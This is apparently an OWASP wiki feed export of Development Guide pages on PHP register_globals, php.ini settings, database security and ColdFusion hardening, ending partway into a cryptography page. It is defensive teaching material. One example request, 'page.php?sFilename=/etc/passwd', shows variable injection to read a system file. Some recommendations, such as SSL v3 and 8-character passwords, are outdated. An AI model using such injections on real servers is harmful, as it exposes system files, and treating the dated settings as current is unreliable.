All variables in PHP are represented by a dollar sign followed by the name of the variable. The names are case-sensitive and must start with a letter or underscore, followed by any number of letters, numbers, or underscores.&lt;br /&gt;
&lt;br /&gt;
==register_globals ==&lt;br /&gt;
&lt;br /&gt;
The register_globals directive makes input from GET, POST and COOKIE, as well as session variables and uploaded files, directly accessible as global variables in PHP. This single directive, if set in php.ini, is the root of many vulnerabilities in web applications. 	 &lt;br /&gt;
&lt;br /&gt;
Let's start by having a look at an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ($bIsAlwaysFalse) &lt;br /&gt;
&lt;br /&gt;
{ &lt;br /&gt;
&lt;br /&gt;
	// This is never executed:&lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
//       ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )   &lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
	//		... &lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
If we were to call this page as '''''page.php?sFilename=/etc/passwd''''' with register_globals set, it would be the same as writing the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sFilename = '/etc/passwd'; // This is done internally by PHP       &lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse )&lt;br /&gt;
&lt;br /&gt;
{       // This is never executed:         &lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
	// ...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PHP takes care of the '''''$sFilename = '/etc/passwd';''''' part for us. What this means is that a malicious user could inject his/her own value for $sFilename and view any file readable under the current security context. &lt;br /&gt;
&lt;br /&gt;
We should always think of the “what if” when writing code. Turning off register_globals might be a solution, but what if our code ends up on a server with register_globals on? We must bear in mind that all variables in global scope could have been tampered with. The correct way to write the above code is to make sure that we always assign a value to '''''$sFilename''''': &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// We initialize $sFilename to an empty string&lt;br /&gt;
&lt;br /&gt;
$sFilename = '';&lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse ) { 	    &lt;br /&gt;
&lt;br /&gt;
// This is never executed:     &lt;br /&gt;
&lt;br /&gt;
$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' ) {     &lt;br /&gt;
&lt;br /&gt;
// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Another solution is to keep as little code as possible in global scope. Object-oriented programming (OOP) works well here: writing almost all of our code in classes is generally safer and promotes reuse. Just as we should never assume that register_globals is off, we should never assume it is on. The correct way to get input from GET, POST, COOKIE, etc. is to use the superglobals that were added in PHP 4.1.0: the $_GET, $_POST, $_ENV, $_SERVER, $_COOKIE, $_REQUEST, $_FILES, and $_SESSION arrays. They are called superglobals because they are always available, regardless of scope.&lt;br /&gt;
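&lt;br /&gt;
For example, the vulnerable page above could read its parameter explicitly from the superglobal; this is a sketch, and the whitelist check is an assumption added for illustration:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Read input explicitly; never rely on register_globals&lt;br /&gt;
$sFilename = isset($_GET['sFilename']) ? $_GET['sFilename'] : '';&lt;br /&gt;
&lt;br /&gt;
// Illustrative whitelist check before opening the file&lt;br /&gt;
if (!in_array($sFilename, array('page1.php', 'page2.php'), true))&lt;br /&gt;
{&lt;br /&gt;
	$sFilename = '';&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;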
&lt;br /&gt;
'''register_globals '''&lt;br /&gt;
&lt;br /&gt;
If set, PHP will create global variables from all user input coming from GET, POST, and COOKIE. If you have the opportunity to turn off this directive, you should definitely do so. Unfortunately, a great deal of existing code relies on it, so you are lucky if you can get away with it. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''safe_mode '''&lt;br /&gt;
&lt;br /&gt;
The PHP safe mode applies a set of restrictions to PHP scripts and can significantly increase security in a shared server environment. To name a few of these restrictions: a script can only access/modify files and folders that have the same owner as the script itself, and some functions/operators are completely disabled or restricted, like the backtick operator. &lt;br /&gt;
&lt;br /&gt;
'''disable_functions '''&lt;br /&gt;
&lt;br /&gt;
This directive can be used to disable functions of our choosing. &lt;br /&gt;
&lt;br /&gt;
'''open_basedir '''&lt;br /&gt;
&lt;br /&gt;
Restricts PHP so that all file operations are limited to the directory set here and its subdirectories. &lt;br /&gt;
&lt;br /&gt;
'''allow_url_fopen '''&lt;br /&gt;
&lt;br /&gt;
With this option set PHP can operate on remote files with functions like include and fopen. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''error_reporting '''&lt;br /&gt;
&lt;br /&gt;
We want to write code that is as clean as possible, and thus we want PHP to report all warnings and notices to us. &lt;br /&gt;
&lt;br /&gt;
Recommended: E_ALL &lt;br /&gt;
&lt;br /&gt;
'''log_errors '''&lt;br /&gt;
&lt;br /&gt;
Logs all errors to a location specified in php.ini. &lt;br /&gt;
&lt;br /&gt;
Recommended: on &lt;br /&gt;
&lt;br /&gt;
'''display_errors '''&lt;br /&gt;
&lt;br /&gt;
With this directive set, all errors that occur during the execution of scripts, with respect to error_reporting, will be sent to the browser. This is desired in a development environment but not on a production server, since it could expose sensitive information about our code, database or web server. &lt;br /&gt;
&lt;br /&gt;
Recommended: off (production), on (development) &lt;br /&gt;
&lt;br /&gt;
'''magic_quotes_gpc '''&lt;br /&gt;
&lt;br /&gt;
Escapes all input coming in from POST, GET, and COOKIE. This is something we should handle on our own. &lt;br /&gt;
&lt;br /&gt;
This also applies to '''magic_quotes_runtime'''. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''post_max_size, upload_max_filesize and memory_limit '''&lt;br /&gt;
&lt;br /&gt;
These directives should be set at a reasonable level to reduce the risk of resource starvation attacks.&lt;br /&gt;
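&lt;br /&gt;
Taken together, the recommendations above might appear in php.ini as the following fragment; the size and memory values are illustrative and should be tuned for your application:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
register_globals     = Off&lt;br /&gt;
allow_url_fopen      = Off&lt;br /&gt;
error_reporting      = E_ALL&lt;br /&gt;
log_errors           = On&lt;br /&gt;
display_errors       = Off   ; production servers only&lt;br /&gt;
magic_quotes_gpc     = Off&lt;br /&gt;
magic_quotes_runtime = Off&lt;br /&gt;
post_max_size        = 8M    ; illustrative value&lt;br /&gt;
upload_max_filesize  = 2M    ; illustrative value&lt;br /&gt;
memory_limit         = 16M   ; illustrative value&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;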
&lt;br /&gt;
==Database security ==&lt;br /&gt;
&lt;br /&gt;
Data obtained from the user needs to be stored securely. In nearly every application, insufficient care is taken to ensure that data cannot be obtained from the database itself.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application connect to the database using low privilege users? &lt;br /&gt;
&lt;br /&gt;
* Are there different database connection users for application administration and normal user activities? If not, why not?&lt;br /&gt;
&lt;br /&gt;
* Does the application make use of safer constructs, such as stored procedures which do not require direct table access?&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** Is the database on another host? Is that host locked down? &lt;br /&gt;
** Are all patches deployed and the latest database software in use?&lt;br /&gt;
** Does the application connect to the database using an encrypted link? If not, are the application server and database server in a restricted network with minimal other hosts, particularly untrusted hosts like desktop workstations?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database using the lowest-privilege user possible.&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database with different credentials for every trust distinction (e.g., user, read-only user, guest, administrators) and permissions applied to those tables and databases to prevent unauthorized access and modification.&lt;br /&gt;
&lt;br /&gt;
* The application should prefer safer constructs, such as stored procedures which do not require direct table access. Once all access is through stored procedures, access to the tables should be revoked.&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** The database should be on another host, which should be locked down with all current patches deployed and latest database software in use.&lt;br /&gt;
** The application should connect to the database using an encrypted link. If not, the application server and database server must reside in a restricted network with minimal other hosts. &lt;br /&gt;
** Do not deploy the database server in the main office network.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ITIL – Change Management http://www.itil.org.uk/&lt;br /&gt;
&lt;br /&gt;
==ColdFusion Components (CFCs) ==&lt;br /&gt;
&lt;br /&gt;
This section provides guidance on using ColdFusion components (CFCs) without exposing your web application to unnecessary risk.  ColdFusion provides two ways of restricting access to CFCs: role-based security and access control.&lt;br /&gt;
&lt;br /&gt;
Role-based security is implemented by the '''''roles''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The attribute contains a comma-delimited list of security roles that can call this method.&lt;br /&gt;
&lt;br /&gt;
Access control is implemented by the '''''access''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The possible values of the attribute, from most to least restrictive, are: private (strongest), package, public (default), and remote (weakest).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Private:''' The method is accessible only to methods within the same component. This is similar to the Object Oriented Programming (OOP) private modifier.&lt;br /&gt;
&lt;br /&gt;
'''Package:'''  The method is accessible only to other methods within the same package. This is similar to OOP package-level access.&lt;br /&gt;
&lt;br /&gt;
'''Public:''' The method is accessible to any CFC or CFM on the same server. This is similar to the OOP public modifier.&lt;br /&gt;
&lt;br /&gt;
'''Remote:''' Allows all the privileges of public, in addition to accepting remote requests from HTML forms, Flash, or web services. This option is required to publish the function as a web service.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Do not use THIS scope inside a component to expose properties. Use a getter or setter function instead.  For example, instead of using THIS.myVar create a public function that sets the variable (i.e. setMyVar(value)).&lt;br /&gt;
&lt;br /&gt;
*Do not omit the roles attribute; if it is omitted, ColdFusion will not restrict user access to the function.&lt;br /&gt;
&lt;br /&gt;
*Avoid using access=&amp;quot;remote&amp;quot; if you do not intend to call the component directly from a URL.&lt;br /&gt;
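&lt;br /&gt;
As a sketch of these practices, a locked-down setter method might look like the following; the component, role, and variable names are invented for illustration:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfcomponent&amp;gt;&lt;br /&gt;
	&amp;lt;!--- Accessible only within this package, and only to the admin role ---&amp;gt;&lt;br /&gt;
	&amp;lt;cffunction name=&amp;quot;setMyVar&amp;quot; access=&amp;quot;package&amp;quot; roles=&amp;quot;admin&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;cfargument name=&amp;quot;value&amp;quot; required=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;cfset variables.myVar = arguments.value&amp;gt;&lt;br /&gt;
	&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&amp;lt;/cfcomponent&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;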
&lt;br /&gt;
==Configuration ==&lt;br /&gt;
&lt;br /&gt;
The following section describes some of the server-wide security-related options available to a ColdFusion administrator via the ColdFusion MX 7 Administrator console web application (http://servername:port/CFIDE/administrator/index.cfm). If the console application is unavailable, you can modify these options by editing the XML files in the cf_root/lib/ (Server configuration) or cf_web_root/WEB-INF/cfusion/lib (J2EE configuration) directory; however, editing these files directly is not recommended.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice '''&lt;br /&gt;
&lt;br /&gt;
*CF Admin Password screen&lt;br /&gt;
&lt;br /&gt;
*Enable a strong Administrator password&lt;br /&gt;
**'''The ColdFusion Administrator is the default interface for configuring the ColdFusion application server. It is secured by a single password. Ensure that the Administrator security is enabled and the password is strong and stored in a secure place.'''&lt;br /&gt;
**Ensure the checkbox is filled&lt;br /&gt;
**Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
**Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox Security screen'''&lt;br /&gt;
&lt;br /&gt;
Enable Sandbox Security&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''The ColdFusion Sandbox allows you to place access security restrictions on files, directories, methods, and data sources.  Sandboxes make the most sense for a hosting provider or corporate intranet where multiple applications share the same server. Enable this option.'''&lt;br /&gt;
&lt;br /&gt;
'''Next, a sandbox needs to be configured; otherwise, all code in all directories will execute without restriction.  Code in a directory and its subdirectories inherits the access controls defined for the sandbox.  For example, if ABC Company creates multiple applications within their directory, all applications will have the same permissions as the parent.  A sandbox applied to ABC-apps will apply to app1 and app2.  A sample directory structure is shown below:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app1'''&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app2'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Note: if a new sandbox is created for app2 then it will not inherit settings from ABC-apps.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox security configurations are application specific; however, there are general guidelines that should be followed:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create a default restricted sandbox and copy its settings to each subsequent sandbox, removing restrictions as needed by the application, except in the case of files/directories, where access is granted rather than restricted.&lt;br /&gt;
&lt;br /&gt;
Restrict access to data sources that should not be accessed by the sandboxed application.&lt;br /&gt;
&lt;br /&gt;
Restrict access to powerful tags, for example CFREGISTRY and CFEXECUTE.&lt;br /&gt;
&lt;br /&gt;
Restrict file and directory access to limit the ability of tags and functions to perform actions to specified paths.&lt;br /&gt;
&lt;br /&gt;
'''''Every''''' application should have a sandbox.&lt;br /&gt;
&lt;br /&gt;
In multi-homed environments disable Java Server Pages (JSP) as ColdFusion is unable to restrict the functionality of the underlying Java server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RDS Password screen'''&lt;br /&gt;
&lt;br /&gt;
Enable a strong RDS password&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Developers can access ColdFusion resources (files and data sources) over HTTP from Macromedia Dreamweaver MX and HomeSite+ through ColdFusion’s Remote Development Services (RDS). This feature is password protected and should only be enabled in secure development environments.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensure the checkbox is filled&lt;br /&gt;
&lt;br /&gt;
Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
&lt;br /&gt;
Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use RDS over SSL - During development, you should use SSL v3 to encrypt all RDS communications between Dreamweaver MX and the ColdFusion server. This includes remote access to server data sources and drives, provided that both are accessed through RDS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable RDS in Production&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''In production environments, you should not use RDS. In earlier versions of ColdFusion, RDS ran as a separate service or process and could be disabled by disabling the service. In ColdFusion MX, RDS is integrated into the main service. To disable it, you must disable the RDSServlet mapping in the web.xml file. The following procedure assumes that ColdFusion is installed in the default location.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''1.	Back up the C:\CFusionMX7\wwwroot\WEB-INF\web.xml file.'''&lt;br /&gt;
&lt;br /&gt;
'''2.	Open the web.xml file for editing.'''&lt;br /&gt;
&lt;br /&gt;
'''3.	Comment out the RDSServlet mapping, as follows:'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;!--'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-mapping&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-name&amp;gt;RDSServlet&amp;lt;/servlet-name&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;url-pattern&amp;gt;/CFIDE/main/ide.cfm&amp;lt;/url-pattern&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;/servlet-mapping&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''--&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''4.	Save the file.'''&lt;br /&gt;
&lt;br /&gt;
'''5.	Restart ColdFusion.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Settings Screen&lt;br /&gt;
&lt;br /&gt;
Enable a Request Timeout&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion processes requests simultaneously and queues all requests above the configured maximum number of simultaneous requests. If requests run abnormally long, this can tie up server resources and lead to DoS attacks. This setting will terminate requests when the configured timeout is reached.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Fill the checkbox next to “Timeout Request after (seconds)”&lt;br /&gt;
&lt;br /&gt;
Enter the number of seconds for ColdFusion to allow threads to run&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To allow a valid template request to run beyond the configured timeout, place a &amp;lt;cfsetting&amp;gt; atop the base ColdFusion template and configure the RequestTimeout attribute for the necessary amount of time (in seconds).'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use UUID for cftoken&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best practice calls for J2EE session management. In the event that only ColdFusion session management is available, strong security identifiers must be used. Enable this setting to change the default 8-character CFToken security token string to a UUID.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable Global Script Protection - This is a new security feature in ColdFusion MX 7 that isn’t available in other web application platforms. It helps protect Form, URL, CGI, and Cookie scope variables from cross-site scripting attacks. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Site-wide Error Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Prevent information leaks through verbose error messages. Specifying a site-wide error handler covers you when cftry/cfcatch are not used. This page should be a generic error message that you return to the user. Also, if the error handler displays user-input, it should be reviewed for potential cross-site scripting issues.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Missing Template Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Provide a custom message page for HTTP 404 errors when the server cannot find the requested ColdFusion template.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configure memory throttling&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To prevent file upload DoS attacks, Macromedia added new configuration settings to ColdFusion MX 7.0.1 that allow administrators to restrict the total upload size of HTTP POST operations. Configure these settings accordingly.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
maximum size for post data&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This is the total size that ColdFusion will accept for any single HTTP POST request (including file uploads). ColdFusion will reject any request whose Content-Length header exceeds this setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Threshold &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''HTTP POST requests larger than this setting (default is 4MB) are included in the total concurrent request memory size and get queued if they exceed the Request Throttle Memory setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Memory &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This sets the total amount of memory (MB) ColdFusion reserves for concurrent HTTP POST requests. Any requests exceeding this limit are queued until enough memory is available. '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Memory Variables screen'''&lt;br /&gt;
&lt;br /&gt;
Enable J2EE Session Management and Use J2EE session variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Best practice requires J2EE sessions because they are more secure than regular ColdFusion sessions. (See Session Management section)&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable Session Variables”&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable J2EE session variables”&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum session timeout to 20 minutes to limit the window of opportunity for session hijacking.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default session timeout to 20 minutes to limit the window of opportunity for session hijacking. (The default value is 20 minutes.)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The session-timeout parameter in the cf_root/WEB-INF/web.xml file establishes the maximum J2EE session timeout. This setting should always be greater than or equal to ColdFusion’s Maximum Session Timeout value.&lt;br /&gt;
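&lt;br /&gt;
In web.xml this is set with the session-config element; the value below (in minutes) is illustrative:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;session-config&amp;gt;&lt;br /&gt;
	&amp;lt;session-timeout&amp;gt;20&amp;lt;/session-timeout&amp;gt;&lt;br /&gt;
&amp;lt;/session-config&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;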
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum application timeout to 24 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default application timeout to 8 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Sources screen'''&lt;br /&gt;
&lt;br /&gt;
Do not use an administrative account to connect ColdFusion to a data source. For example, do not use the SA account to connect to a MS SQL Server. The account accessing the database should be granted specific privileges to the objects it needs to access. In addition, the account created to connect to the database should be an OS-based account, not a SQL account. Operating system accounts have many more auditing, password, and other security controls associated with them.  For example, account lockouts and password complexity requirements are built into the Windows operating system; however, a database would need custom code to handle these security-related tasks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable the following Allowed SQL options for all data sources:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create&lt;br /&gt;
&lt;br /&gt;
Drop&lt;br /&gt;
&lt;br /&gt;
Grant&lt;br /&gt;
&lt;br /&gt;
Revoke&lt;br /&gt;
&lt;br /&gt;
Alter&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''As an administrator, you do not have control over what a developer sends to the database; however, there should be no circumstance where the previous commands need to be sent to a database from a web application.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging Settings screen'''&lt;br /&gt;
&lt;br /&gt;
Disable Robust Exception for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable Debugging for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging IP Addresses'''&lt;br /&gt;
&lt;br /&gt;
Ensure only the addresses of trusted clients are in the IP list.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Only allow the localhost IP (127.0.0.1) in the list on production machines.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Mail screen'''&lt;br /&gt;
&lt;br /&gt;
Require a user name and password to authenticate to your mail server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the connection timeout to 60 seconds. (The default value is 60 seconds.)&lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity|Secure Lifecycle]]&lt;br /&gt;
[[category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59967</id>
		<title>Guide to Cryptography</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59967"/>
				<updated>2009-05-03T16:01:14Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* How to determine if you are vulnerable */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that cryptography is safely used to protect the confidentiality and integrity of sensitive user data.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS5.18 – Cryptographic key management&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Initially confined to the realms of academia and the military, cryptography has become ubiquitous thanks to the Internet. Common everyday uses of cryptography include mobile phones, passwords, SSL, smart cards, and DVDs. Cryptography has permeated daily life, and is heavily used by many web applications.&lt;br /&gt;
&lt;br /&gt;
Cryptography (or crypto) is one of the more advanced topics of information security, and one whose understanding requires the most schooling and experience. It is difficult to get right because there are many approaches to encryption, each with advantages and disadvantages that need to be thoroughly understood by web solution architects and developers.  In addition, serious cryptography research is typically based in advanced mathematics and number theory, providing a serious barrier to entry. &lt;br /&gt;
&lt;br /&gt;
The proper and accurate implementation of cryptography is extremely critical to its efficacy. A small mistake in configuration or coding will remove a large degree of the protection it affords, rendering the crypto implementation useless against serious attacks.&lt;br /&gt;
&lt;br /&gt;
A good understanding of crypto is required to be able to discern between solid products and snake oil. The inherent complexity of crypto makes it easy to fall for fantastic claims from vendors about their product. Typically, these are &amp;quot;a breakthrough in cryptography&amp;quot; or &amp;quot;unbreakable&amp;quot; or provide &amp;quot;military grade&amp;quot; security. If a vendor says &amp;quot;trust us, we have had experts look at this,&amp;quot; chances are they weren't experts!&lt;br /&gt;
&lt;br /&gt;
==Cryptographic Functions ==&lt;br /&gt;
&lt;br /&gt;
Cryptographic systems can provide one or more of the following four services. It is important to distinguish between them, as some algorithms are better suited to particular tasks than others.&lt;br /&gt;
&lt;br /&gt;
When analyzing your requirements and risks, you need to decide which of these four functions should be used to protect your data.&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Using a cryptographic system, we can establish the identity of a remote user (or system). A typical example is the SSL certificate of a web server providing proof to the user that he or she is connected to the correct server.&lt;br /&gt;
&lt;br /&gt;
The identity is not of the user, but of the cryptographic key of the user. Having a less secure key lowers the trust we can place on the identity.&lt;br /&gt;
&lt;br /&gt;
===Non-Repudiation ===&lt;br /&gt;
&lt;br /&gt;
The concept of non-repudiation is particularly important for financial or e-commerce applications. Often, cryptographic tools are required to prove that a unique user has made a transaction request. It must not be possible for the user to refute his or her actions.&lt;br /&gt;
&lt;br /&gt;
For example, a customer may request a transfer of money from her account to be paid to another account. Later, she claims never to have made the request and demands the money be refunded to the account. If we have non-repudiation through cryptography, we can prove – usually through digitally signing the transaction request, that the user authorized the transaction.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
More commonly, the biggest concern will be to keep information private. Cryptographic systems were originally developed to function in this capacity. Whether it be passwords sent during a log on process, or storing confidential medical records in a database, encryption can assure that only users who have access to the appropriate key will get access to the data.&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
We can use cryptography to ensure that data has not been altered during storage or transmission. Cryptographic hashes, for example, can safeguard data by providing a secure checksum.&lt;br /&gt;
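&lt;br /&gt;
As a sketch of the keyed-checksum idea, the following uses Python's standard hmac module (Python is chosen here purely for illustration; the same pattern exists on every platform the Guide discusses):&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib
import hmac

def make_checksum(key: bytes, data: bytes) -> str:
    """Return a keyed SHA-256 checksum (HMAC) of the data."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

key = b"shared-secret-key"            # hypothetical shared secret
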